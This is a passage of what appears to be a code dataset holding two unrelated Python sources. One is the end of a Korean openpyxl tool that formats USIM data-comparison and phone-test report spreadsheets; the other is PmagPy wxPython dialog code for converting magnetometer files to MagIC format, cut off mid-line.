sheet_cell_list = ['A', 'B', 'C']\n sheet_width_list = [20.13, 39, 39]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for i in [3, 26]:\n sheet_out['A' + str(i)].fill = self.brown_fill\n sheet_out['B' + str(i)].fill = self.brown_fill\n sheet_out['C' + str(i)].fill = self.brown_fill\n\n for i in range(4, 24):\n sheet_out['A' + str(i)].fill = self.gray_fill\n\n for i in range(27, 38):\n sheet_out['A' + str(i)].fill = self.gray_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"첨부3\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. 
{}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # f2 function\n def f2_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n wb_output = openpyxl.load_workbook(item, data_only=True)\n # option setting wb.output\n sheet_in = wb_output['Profile']\n wb_output.create_sheet('Comparison', 2)\n sheet_out = wb_output['Comparison']\n # 1st list items are fixed usim info, 2nd list items are variable usim info\n list_find = [['ESN', 'HPPLMN', 'HPLMNNWACT', 'FPLMN', 'PWS', 'HPLMNwACT', 'DOMAIN'],\n ['IMEI', 'IMSI', 'KEYS', 'KEYSPS', 'MSISDN', 'SMSP', 'PSLOCI', 'ACC', 'LOCI', 'IMSI_M',\n 'MDN', 'IRM', 'IMPI', 'IMPU', 'P_CSCF']]\n list_fixed_item = []\n list_variable_item = []\n list_reference_item = [\n '0000FFFFFFFFFFFF',\n '01',\n '54F050400054F0508000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000',\n '54F08054F06054F00354F040',\n 'FCFFFFFFFFFFFFFFFFFF',\n '54F050400054F0508000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000',\n '800A736B74696D732E6E6574FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF',\n ]\n\n total_row = len(sheet_in['A'])\n\n # sheet row 1 handle\n sheet_out.merge_cells('B1:E1')\n sheet_out['B1'] = 'USIM DATA COMPARISON'\n # sheet row 2 handle\n sheet_out['B2'] = 'EF파일명'\n sheet_out['C2'] = 'DATA값'\n sheet_out['D2'] = '고정기준값'\n sheet_out['E2'] = '비교'\n\n # finding fixed value\n for fixed in list_find[0]:\n for i in range(2, total_row+1):\n if sheet_in['A' + str(i)].value == fixed:\n data = sheet_in['Q' + str(i)].value.strip()\n data = re.sub(r'[\\n,\\s,\\t]', '', data)\n list_fixed_item.append(data)\n break\n\n # finding variable value\n for variable in list_find[1]:\n for i in range(2, total_row+1):\n if sheet_in['A' + str(i)].value == variable:\n data = sheet_in['Q' + str(i)].value.strip()\n data = re.sub(r'[\\n,\\s,\\t]', '', data)\n list_variable_item.append(data)\n break\n\n # red\n # 3~ 24 rows fill data\n # 3~9까지 fixed\n # 10~24까지 variable\n\n # all cell font adjust\n for mCell in sheet_out[\"B2:E24\"]:\n for cell in mCell:\n cell.font = self.f2_value_font\n\n sheet_out['B1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n # 고정값 Set\n for i, f_item in enumerate(list_fixed_item):\n sheet_out['B' + str(i + 3)] = list_find[0][i]\n sheet_out['B' + str(i + 3)].fill = self.yellow_fill\n sheet_out['C' + str(i + 3)] = f_item\n sheet_out['D' + str(i + 3)] = list_reference_item[i]\n sheet_out['D' + str(i + 3)].fill = self.yellow_fill\n\n if list_fixed_item[i] == list_reference_item[i]:\n sheet_out['E' + str(i + 3)] = 'True(일치함)'\n sheet_out['E' + str(i + 3)].font = self.f2_blue_font\n else:\n sheet_out['E' + str(i + 3)] = 'False(불일치)'\n sheet_out['E' + str(i + 3)].font = self.f2_red_font\n\n sheet_out['E' + str(i + 3)].fill = self.yellow_fill\n\n # 가변값 Set\n for i, v_item in enumerate(list_variable_item):\n sheet_out['B' + str(i + 10)] = list_find[1][i]\n sheet_out['B' + str(i + 10)].fill = self.orange_fill\n sheet_out['C' + str(i + 10)] = v_item\n sheet_out['D' + str(i + 10)].fill = self.orange_fill\n sheet_out['E' + str(i + 10)].fill = self.orange_fill\n\n self.setPrintText('/s {}번 파일 \"Comparison\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"B2:E24\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n\n # top alignment adjust\n for mCell in 
sheet_out[\"C4:C24\"]:\n for cell in mCell:\n cell.alignment = self.top_alignment_3\n\n for mCell in sheet_out[\"D4:D24\"]:\n for cell in mCell:\n cell.alignment = self.top_alignment_3\n\n # all cell border adjust\n for mCell in sheet_out[\"B2:E24\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # set filter\n sheet_out.auto_filter.ref = \"B2:E24\"\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D', 'E']\n sheet_width_list = [4.25, 14.75, 57, 57, 23]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n sheet_out['B2'].fill = self.brown_fill\n sheet_out['C2'].fill = self.brown_fill\n sheet_out['D2'].fill = self.brown_fill\n sheet_out['E2'].fill = self.brown_fill\n\n\n self.currentRow = self.currentRow + 1\n self.totalRows = self.totalRows + 1\n self.progress_flag.emit()\n self.setPrintText('/s {}번 파일 \"Comparison\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # main method\n def run(self):\n\n try:\n ###########################__Setting print Text Thread__######################\n\n self.thread_count = threading.Thread(target=self.getCountRows, args=())\n self.thread_count.daemon = True\n self.thread_count.start()\n self.nowTime = datetime.today().strftime(\"%Y-%m-%d\")\n\n #################################################################_SETTING INPUT_###########################################################################\n # Save root directory\n self.flag_root = os.path.isdir(self.home+\"\\\\Desktop\\\\DOC\\\\\")\n if not self.flag_root:\n os.mkdir(self.home + \"\\\\Desktop\\\\DOC\\\\\")\n\n # extract file name each list_files and make every out file path\n for item in self.list_files:\n temp_filename = os.path.basename(item)\n temp_filename = re.sub(\"(.xlsx|.xls)\", \"\", temp_filename)\n output_file = self.home+\"\\\\Desktop\\\\DOC\\\\result_\"+temp_filename+\"(\"+self.nowTime+\").xlsx\"\n self.list_out_files.append(output_file)\n\n if self.modeFlag == \"f1\":\n\n #################################################################_RESULT FILE Generate_###########################################################################\n # output file generate\n for item in self.list_out_files:\n\n wb = Workbook()\n s1 = wb.active\n s1.title = \"검증결과요약\"\n wb.create_sheet('시험결과요약', 1)\n wb.create_sheet('TRP', 2)\n wb.create_sheet('TIS', 3)\n wb.create_sheet('속도', 4)\n wb.create_sheet('Call Setup Test', 5)\n wb.create_sheet('주파수동조', 6)\n wb.create_sheet('MOS', 7)\n wb.create_sheet('배터리소모전류(시간)', 8)\n wb.create_sheet('배터리소모전류 세부데이터', 9)\n wb.create_sheet('배터리소모전류(DOU)', 10)\n wb.create_sheet('첨부1. 측정기준 및 가점', 11)\n wb.create_sheet('첨부2. 납품검사', 12)\n wb.create_sheet('첨부3. 
단말 상세 SPEC', 13)\n wb.save(item)\n\n self.setPrintText(\"/s Complete making Result excel file /e\")\n self.setPrintText(\"/s Extract Original Data in each file /e\")\n\n #Core Code\n self.start_time = datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")\n # log start timestamp\n self.setPrintText(\"/s STARTED_TIME: \"+self.start_time+\" /e\")\n\n ########################################################################Start to generate openpyxl Sheet Style########################################################################\n # generate the 검증결과요약 (verification result summary) tab\n self.summary_generate_data()\n self.totalRows = 1\n self.currentRow = 0\n self.progress_flag.emit()\n\n # generate the 시험결과요약 (test result summary) tab\n self.test_generate_data()\n self.totalRows = 2\n self.currentRow = 0\n self.progress_flag.emit()\n\n # generate the TRP tab\n self.trp_generate_data()\n self.totalRows = 3\n self.currentRow = 0\n self.progress_flag.emit()\n\n # generate the TIS tab\n self.tis_generate_data()\n self.totalRows = 4\n self.currentRow = 0\n self.progress_flag.emit()\n\n # generate the 속도 (speed) tab\n self.spd_generate_data()\n self.totalRows = 5\n self.currentRow = 0\n self.progress_flag.emit()\n\n # generate the Call Setup Test tab\n self.call_generate_data()\n self.totalRows = 6\n self.currentRow = 0\n self.progress_flag.emit()\n\n # generate the 주파수동조 (frequency tuning) tab\n self.fre_generate_data()\n self.totalRows = 7\n self.currentRow = 0\n self.progress_flag.emit()\n\n # generate the MOS tab\n self.mos_generate_data()\n self.totalRows = 8\n self.currentRow = 0\n self.progress_flag.emit()\n\n # generate the 배터리소모전류(DOU) tab\n self.dou_generate_data()\n self.totalRows = 9\n self.currentRow = 0\n self.progress_flag.emit()\n\n # generate the 배터리소모전류 세부데이터 tab\n self.bat_generate_data()\n self.totalRows = 10\n self.currentRow = 0\n self.progress_flag.emit()\n\n # generate the 배터리소모전류(시간) tab\n self.time_generate_data()\n self.totalRows = 11\n self.currentRow = 0\n self.progress_flag.emit()\n\n # generate the 첨부1. 측정기준 및 가점 tab\n self.attach_generate_data_1()\n self.totalRows = 12\n self.currentRow = 0\n self.progress_flag.emit()\n\n # generate the 첨부2. 납품검사 tab\n self.attach_generate_data_2()\n self.totalRows = 13\n self.currentRow = 0\n self.progress_flag.emit()\n\n # generate the 첨부3. 단말 상세 SPEC tab\n self.attach_generate_data_3()\n self.totalRows = 14\n self.currentRow = 0\n self.progress_flag.emit()\n\n #############################################__progress 100%__#############################################\n self.end_count = \"y\"\n self.end_flag.emit()\n\n #Core Code\n self.end_time = datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")\n # log finish timestamp\n self.setPrintText(\"/s FINISHED_TIME: \"+self.end_time+\" /e\")\n\n else:\n #Core Code\n self.start_time = datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")\n # log start timestamp\n self.setPrintText(\"/s STARTED_TIME: \"+self.start_time+\" /e\")\n self.f2_generate_data()\n self.end_count = \"y\"\n self.end_flag.emit()\n #Core Code\n self.end_time = datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")\n # log finish timestamp\n self.setPrintText(\"/s FINISHED_TIME: \"+self.end_time+\" /e\")\n\n except:\n self.setPrintText('/s Error: {}. 
{}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\nif __name__ == '__main__':\n moduler = Formater('C:\\\\Users\\\\TestEnC\\\\Desktop\\\\VOC\\\\input_sample.xlsx', 'y', 'f1')\n moduler.run()\n
+{"seq_id": "373122207", "text": "#!/usr/bin/env pythonw\n\n#--------------------------------------------------------------\n# converting magnetometer files to MagIC format\n#--------------------------------------------------------------\nimport wx\nimport wx.grid\nimport os\nimport subprocess\nimport sys\nfrom pmagpy import pmag\nfrom pmagpy import ipmag\nfrom pmagpy import convert_2_magic as convert\nfrom dialogs import pmag_widgets as pw\nfrom dialogs import drop_down_menus3\nfrom dialogs import magic_grid2 as magic_grid\n#sys.path.append(\"../programs\") #later fix imports further down in code to \"from programs import ....\" also imports should be moved to top of file unless import is so large it slows down the program\nfrom pmagpy import convert_2_magic as convert\nfrom programs.conversion_scripts import tdt_magic\nfrom programs.conversion_scripts import jr6_txt_magic\nfrom programs.conversion_scripts import jr6_jr6_magic\nfrom programs.conversion_scripts import iodp_jr6_magic\nfrom pmagpy.mapping import map_magic\n\n\nclass import_magnetometer_data(wx.Dialog):\n def __init__(self, parent, id, title, WD):\n wx.Dialog.__init__(self, parent, id, title, name='import_magnetometer_data')\n self.parent = parent\n self.WD = WD\n self.InitUI()\n self.SetTitle(title)\n\n\n def InitUI(self):\n self.panel = wx.Panel(self)\n vbox = wx.BoxSizer(wx.VERTICAL)\n\n formats = ['generic format','SIO format','CIT format','2g-binary format','2g-ascii format',\n 'HUJI format','LDEO format','IODP format','PMD (ascii) format',\n 'TDT format', 'JR6 format', 'Utrecht format', 'BGC format']\n sbs = wx.StaticBoxSizer(wx.StaticBox(self.panel, wx.ID_ANY, 'step 1: choose file format'), wx.VERTICAL)\n sbs.AddSpacer(5)\n\n radio_buttons = []\n for fmt in formats:\n radio_button = wx.RadioButton(self.panel, -1, label=fmt, name=fmt)\n radio_buttons.append(radio_button)\n sbs.Add(radio_button, flag=wx.BOTTOM, border=5)\n if len(radio_buttons) == 1:\n sbs.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\n #sbs.AddSpacer(5)\n self.Bind(wx.EVT_RADIOBUTTON, self.OnRadioButtonSelect, radio_button)\n\n radio_buttons[0].SetValue(True)\n self.checked_rb = radio_buttons[0]\n\n #---------------------\n # OK/Cancel buttons\n #---------------------\n\n hboxok = wx.BoxSizer(wx.HORIZONTAL)\n self.okButton = wx.Button(self.panel, id=-1, label='Import file')\n self.okButton.SetDefault()\n self.Bind(wx.EVT_BUTTON, self.on_okButton, self.okButton)\n self.cancelButton = wx.Button(self.panel, wx.ID_CANCEL, '&Cancel')\n self.Bind(wx.EVT_BUTTON, self.on_cancelButton, self.cancelButton)\n self.Bind(wx.EVT_CLOSE, self.on_cancelButton)\n # re-do the 'quit' binding so that it only closes the current window\n self.parent.Bind(wx.EVT_MENU, lambda event: self.parent.menubar.on_quit(event, self), self.parent.menubar.file_quit)\n\n self.nextButton = wx.Button(self.panel, id=-1, label='Go to next step')\n self.Bind(wx.EVT_BUTTON, self.on_nextButton, self.nextButton)\n hboxok.Add(self.okButton)\n hboxok.AddSpacer(20)\n hboxok.Add(self.cancelButton )\n hboxok.AddSpacer(20)\n hboxok.Add(self.nextButton )\n\n #-----------------------\n # design the frame\n #-----------------------\n vbox.AddSpacer(10)\n vbox.Add(sbs)\n vbox.AddSpacer(10)\n vbox.Add(hboxok)\n vbox.AddSpacer(10)\n\n hbox1=wx.BoxSizer(wx.HORIZONTAL)\n hbox1.AddSpacer(10)\n hbox1.Add(vbox)\n hbox1.AddSpacer(10)\n\n self.panel.SetSizer(hbox1)\n hbox1.Fit(self)\n\n #-----------------------\n # button methods\n #-----------------------\n\n def on_cancelButton(self,event):\n 
self.Destroy()\n self.Parent.Show()\n self.Parent.Raise()\n\n\n def on_okButton(self,event):\n os.chdir(self.WD)\n file_type = self.checked_rb.Label.split()[0] # extracts name of the checked radio button\n if file_type == 'generic':\n dia = convert_generic_files_to_MagIC(self, self.WD, \"PmagPy generic file conversion\")\n elif file_type == 'SIO':\n dia = convert_SIO_files_to_MagIC(self, self.WD, \"PmagPy SIO file conversion\")\n elif file_type == 'CIT':\n dia = convert_CIT_files_to_MagIC(self, self.WD, \"PmagPy CIT file conversion\")\n elif file_type == '2g-binary':\n dia = convert_2g_binary_files_to_MagIC(self, self.WD, \"PmagPy 2g-binary file conversion\")\n elif file_type == '2g-ascii':\n dia = convert_2g_ascii_files_to_MagIC(self, self.WD, \"PmagPy 2g-ascii file conversion\")\n elif file_type == 'HUJI':\n dia = convert_HUJI_files_to_MagIC(self, self.WD, \"PmagPy HUJI file conversion\")\n elif file_type == 'LDEO':\n dia = convert_LDEO_files_to_MagIC(self, self.WD, \"PmagPy LDEO file conversion\")\n elif file_type == 'IODP':\n dia = convert_IODP_files_to_MagIC(self, self.WD, \"PmagPy IODP csv conversion\")\n elif file_type == 'PMD':\n dia = convert_PMD_files_to_MagIC(self, self.WD, \"PmagPy PMD conversion\")\n elif file_type == 'BGC':\n dia = convert_BGC_files_to_magic(self, self.WD, \"PmagPy BGC conversion\")\n elif file_type == 'TDT':\n tdt_magic.convert(False, self.WD)\n return True\n elif file_type == 'JR6':\n dia = convert_JR6_files_to_MagIC(self, self.WD)\n elif file_type == 'Utrecht':\n dia = convert_Utrecht_files_to_MagIC(self, self.WD, \"PmagPy Utrecht conversion\")\n dia.Center()\n dia.Show()\n\n\n def OnRadioButtonSelect(self, event):\n self.checked_rb = event.GetEventObject()\n\n def on_nextButton(self,event):\n self.Destroy()\n combine_dia = combine_magic_dialog(self.WD, self.parent)\n combine_dia.Show()\n combine_dia.Center()\n\n#--------------------------------------------------------------\n# dialog for combine_magic.py\n#--------------------------------------------------------------\n\n\nclass combine_magic_dialog(wx.Frame):\n \"\"\"\"\"\"\n title = \"Combine magic files\"\n\n def __init__(self, WD, parent):\n wx.Frame.__init__(self, parent, wx.ID_ANY, self.title)\n self.panel = wx.ScrolledWindow(self) #wx.Panel(self)\n self.parent = parent\n self.panel.SetScrollbars(20, 20, 50, 50)\n self.WD=WD\n self.InitUI()\n\n def InitUI(self):\n pnl = self.panel\n\n #---sizer information ----\n\n TEXT=\"Step 2: \\nCombine different MagIC formatted files to one file named 'measurements.txt'\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl,label=TEXT),wx.ALIGN_LEFT)\n\n\n #---sizer 0 ----\n self.bSizer0 = pw.combine_files(self, \".magic\", DM=3)\n #------------------\n\n self.okButton = wx.Button(self.panel, wx.ID_OK, \"&OK\")\n self.Bind(wx.EVT_BUTTON, self.on_okButton, self.okButton)\n\n self.cancelButton = wx.Button(self.panel, wx.ID_CANCEL, '&Cancel')\n self.Bind(wx.EVT_BUTTON, self.on_cancelButton, self.cancelButton)\n self.Bind(wx.EVT_CLOSE, self.on_cancelButton)\n\n self.nextButton = wx.Button(self.panel, id=-1, label='Go to last step')\n self.Bind(wx.EVT_BUTTON, self.on_nextButton, self.nextButton)\n # re-do the 'quit' binding so that it only closes the current window\n self.parent.Bind(wx.EVT_MENU, lambda event: self.parent.menubar.on_quit(event, self), self.parent.menubar.file_quit)\n #\n hboxok = wx.BoxSizer(wx.HORIZONTAL)\n hboxok.Add(self.okButton)\n hboxok.Add(self.cancelButton, flag=wx.LEFT, border=5)\n hboxok.Add(self.nextButton, 
flag=wx.LEFT, border=5)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT)\n vbox.AddSpacer(10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT)\n vbox.AddSpacer(10)\n vbox.AddSpacer(10)\n vbox.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(5)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n def on_cancelButton(self,event):\n self.Parent.Show()\n self.Parent.Raise()\n self.Destroy()\n # make sure contribution is created\n self.Parent.get_wd_data()\n\n def on_nextButton(self, event):\n combine_dia = combine_everything_dialog(self.WD, self.Parent)\n combine_dia.Show()\n combine_dia.Center()\n self.Destroy()\n\n def on_okButton(self,event):\n os.chdir(self.WD) # make sure OS is working in self.WD (Windows issue)\n files_text=self.bSizer0.file_paths.GetValue()\n files=files_text.strip('\\n').replace(\" \",\"\")\n if files:\n files = files.split('\\n')\n files = [os.path.join(self.WD, f) for f in files]\n COMMAND=\"combine_magic.py -F measurements.txt -f %s\"%(\" \".join(files) )\n\n if ipmag.combine_magic(files, 'measurements.txt', data_model=3.0):\n MSG=\"%i files were merged into one MagIC format file:\\n measurements.txt.\\n\\nSee the Terminal/message window for errors\"%(len(files))\n dlg1 = wx.MessageDialog(None,caption=\"Message:\", message=MSG ,style=wx.OK|wx.ICON_INFORMATION)\n dlg1.ShowModal()\n dlg1.Destroy()\n else:\n pw.simple_warning()\n return\n\n self.on_nextButton(event)\n self.Destroy()\n\n\nclass combine_everything_dialog(wx.Frame):\n \"\"\"Step 3 dialog: combine MagIC specimens/samples/sites/locations files.\"\"\"\n title = \"Combine MagIC files\"\n\n def __init__(self, WD, parent):\n wx.Frame.__init__(self, parent, wx.ID_ANY, self.title)\n self.panel = wx.ScrolledWindow(self) #wx.Panel(self)\n self.panel.SetScrollbars(20, 20, 50, 50)\n self.parent = parent\n self.WD=WD\n self.InitUI()\n\n def InitUI(self):\n\n pnl = self.panel\n\n #---sizer information ----\n\n TEXT=\"Step 3: \\nCombine MagIC formatted files of the same type into one file (if necessary). 
All files should be from the working directory.\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl,label=TEXT),wx.ALIGN_LEFT)\n\n possible_file_dias = ['specimens.txt', 'samples.txt', 'sites.txt', 'locations.txt']\n self.file_dias = []\n all_files = os.listdir(self.WD)\n for dia in possible_file_dias:\n for f in all_files:\n if dia in f:\n bSizer = pw.combine_files(self, dia, DM=3)\n self.file_dias.append(bSizer)\n break\n if not self.file_dias:\n file_string = ', '.join(possible_file_dias)\n MSG = \"You have no more files that can be combined.\\nFile types that can be combined are:\\n{}\\nNote that your file name must end with the file type, i.e.:\\nsomething_something_specimens.txt\".format(file_string)\n dlg = wx.MessageDialog(None,caption=\"Message:\", message=MSG ,style=wx.OK|wx.ICON_INFORMATION)\n dlg.ShowModal()\n dlg.Destroy()\n\n #------------------\n # re-do the 'quit' binding so that it only closes the current window\n self.parent.Bind(wx.EVT_MENU, lambda event: self.parent.menubar.on_quit(event, self), self.parent.menubar.file_quit)\n\n self.okButton = wx.Button(self.panel, wx.ID_OK, \"&OK\")\n self.Bind(wx.EVT_BUTTON, self.on_okButton, self.okButton)\n\n self.cancelButton = wx.Button(self.panel, wx.ID_CANCEL, '&Cancel')\n self.Bind(wx.EVT_BUTTON, self.on_cancelButton, self.cancelButton)\n self.Bind(wx.EVT_CLOSE, self.on_cancelButton)\n\n hboxok = wx.BoxSizer(wx.HORIZONTAL)\n hboxok.Add(self.okButton)\n hboxok.Add(self.cancelButton, flag=wx.LEFT, border=5 )\n\n #file_dias = [self.bSizer0, self.bSizer1, self.bSizer2]\n if len(self.file_dias) == 4:\n num_cols, num_rows = 2, 2\n else:\n num_cols = min(len(self.file_dias), 3)\n num_rows = 2 if len(self.file_dias) > 3 else 1\n hboxfiles = wx.GridSizer(num_rows, num_cols, 1, 1)\n hboxfiles.AddMany(self.file_dias)\n\n #hboxfiles = wx.BoxSizer(wx.HORIZONTAL)\n #hboxfiles.AddMany([self.bSizer0, self.bSizer1, self.bSizer2])\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.BOTTOM, border=5)\n vbox.AddSpacer(10)\n vbox.Add(hboxfiles, flag=wx.ALIGN_LEFT)\n vbox.AddSpacer(10)\n vbox.AddSpacer(10)\n vbox.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(5)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_cancelButton(self,event):\n self.Parent.Show()\n self.Parent.Raise()\n self.Destroy()\n # make sure contribution is created\n self.Parent.get_wd_data()\n\n def on_okButton(self,event):\n os.chdir(self.WD)\n success = True\n new_files = []\n # go through each pw.combine_files sizer, extract the files, try to combine them into one:\n for bSizer in self.file_dias:\n full_list = bSizer.file_paths.GetValue()\n file_name = bSizer.text\n files = full_list.strip('\\n').replace(\" \", \"\")\n if files:\n files = files.split('\\n')\n else:\n print('No files of {} type found, skipping'.format(file_name))\n continue\n res = ipmag.combine_magic(files, file_name, data_model=3.0)\n if res:\n new_files.append(file_name) # add to the list of successfully combined files\n else:\n success = False\n if success:\n new = '\\n' + '\\n'.join(new_files)\n MSG = \"Created new file(s): {} \\nSee Terminal/message window for details and errors\".format(new)\n dlg1 = wx.MessageDialog(None,caption=\"Message:\", message=MSG ,style=wx.OK|wx.ICON_INFORMATION)\n 
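# note (added comment): ShowModal() blocks until the user dismisses the message;\n # Destroy() then frees the dialog before control returns to the parent frame\n 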
dlg1.ShowModal()\n dlg1.Destroy()\n self.Parent.Show()\n self.Parent.Raise()\n self.Destroy()\n # make sure contribution is created\n self.Parent.get_wd_data()\n\n else:\n pw.simple_warning()\n # make sure contribution is created\n self.Parent.get_wd_data()\n\n\n#--------------------------------------------------------------\n# MagIC generic files conversion\n#--------------------------------------------------------------\n\n\nclass convert_files_to_MagIC(wx.Frame):\n \"\"\"\n Abstract class for file conversion frames\n \"\"\"\n\n def __init__(self, parent, WD, title):\n self.parent = parent\n self.WD = WD\n self.title = title\n wx.Frame.__init__(self, parent, wx.ID_ANY, self.title)\n self.panel = wx.ScrolledWindow(self)\n self.panel.SetScrollbars(20, 20, 50, 50)\n self.InitUI()\n\n def InitUI(self):\n pass\n\n def on_cancelButton(self, event):\n self.Destroy()\n self.parent.Show()\n self.parent.Raise()\n\n def on_add_file_button(self, event):\n text = \"choose file to convert to MagIC\"\n pw.on_add_file_button(self.bSizer0, text)\n\n def on_add_dir_button(self, event):\n text = \"choose directory of files to convert to MagIC\"\n pw.on_add_dir_button(self.bSizer0, text)\n\n\nclass convert_generic_files_to_MagIC(convert_files_to_MagIC):\n \"\"\"Dialog for converting a generic magnetometer file to MagIC format.\"\"\"\n title = \"PmagPy generic file conversion\"\n\n def InitUI(self):\n\n pnl = self.panel\n\n #---sizer info ----\n\n TEXT = \"convert generic file to MagIC format\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl,label=TEXT),wx.ALIGN_LEFT)\n\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 1 ----\n self.bSizer1 = pw.labeled_text_field(pnl)\n\n #---sizer 2 ----\n # unique because only accepts 1 experiment type\n TEXT=\"Experiment:\"\n self.bSizer2 = wx.StaticBoxSizer( wx.StaticBox( self.panel, wx.ID_ANY, \"\" ), wx.HORIZONTAL)\n self.gridBSizer = wx.GridBagSizer(5, 10)\n self.label1 = wx.StaticText(pnl, label=TEXT)\n self.experiments_names=['Demag (AF and/or Thermal)','Paleointensity-IZZI/ZI/ZI','ATRM 6 positions','AARM 6 positions','cooling rate','TRM']\n self.protocol_info = wx.ComboBox(self.panel, -1, self.experiments_names[0], size=(300,25),choices=self.experiments_names, style=wx.CB_READONLY)\n self.gridBSizer.Add(self.label1, (0, 0))\n self.gridBSizer.Add(self.protocol_info, (1, 0))\n self.bSizer2.Add(self.gridBSizer, wx.ALIGN_LEFT)\n #\n self.Bind(wx.EVT_COMBOBOX, self.on_select_protocol, self.protocol_info)\n self.bSizer2a = wx.StaticBoxSizer( wx.StaticBox( self.panel, wx.ID_ANY, \"\" ), wx.HORIZONTAL )\n text = 'Cooling Rate, format is xxx,yyy,zzz with no spaces '\n self.cooling_rate = wx.TextCtrl(pnl)\n self.bSizer2a.AddMany([wx.StaticText(pnl, label=text), self.cooling_rate])\n\n #---sizer 3 ----\n self.bSizer3 = pw.lab_field(pnl)\n\n #---sizer 4 ----\n # unique because only allows 4 choices (most others have ncn choices)\n self.bSizer4 = wx.StaticBoxSizer( wx.StaticBox( self.panel, wx.ID_ANY, \"\" ), wx.VERTICAL )\n self.sample_naming_conventions=['sample=specimen','no. of initial characters','no. 
of terminal characters','character delimited']\n self.sample_naming_convention = wx.ComboBox(self.panel, -1, self.sample_naming_conventions[0], size=(250,25), choices=self.sample_naming_conventions, style=wx.CB_READONLY)\n self.sample_naming_convention_char = wx.TextCtrl(self.panel, id=-1, size=(40,25))\n gridbSizer4 = wx.GridSizer(2, 2, 0, 10)\n gridbSizer4.AddMany( [(wx.StaticText(self.panel,label=\"specimen-sample naming convention\",style=wx.TE_CENTER),wx.ALIGN_LEFT),\n (wx.StaticText(self.panel,label=\"delimiter/number (if necessary)\",style=wx.TE_CENTER),wx.ALIGN_LEFT),\n (self.sample_naming_convention,wx.ALIGN_LEFT),\n (self.sample_naming_convention_char,wx.ALIGN_LEFT)])\n #bSizer4.Add(self.sample_specimen_text,wx.ALIGN_LEFT)\n self.bSizer4.AddSpacer(10)\n self.bSizer4.Add(gridbSizer4,wx.ALIGN_LEFT)\n\n #---sizer 5 ----\n self.bSizer5 = wx.StaticBoxSizer( wx.StaticBox( self.panel, wx.ID_ANY, \"\" ), wx.VERTICAL )\n self.site_naming_conventions=['site=sample','no. of initial characters','no. of terminal characters','character delimited']\n self.site_naming_convention_char = wx.TextCtrl(self.panel, id=-1, size=(40,25))\n self.site_naming_convention = wx.ComboBox(self.panel, -1, self.site_naming_conventions[0], size=(250,25), choices=self.site_naming_conventions, style=wx.CB_READONLY)\n gridbSizer5 = wx.GridSizer(2, 2, 0, 10)\n gridbSizer5.AddMany( [(wx.StaticText(self.panel,label=\"site-sample naming convention\",style=wx.TE_CENTER),wx.ALIGN_LEFT),\n (wx.StaticText(self.panel,label=\"delimiter/number (if 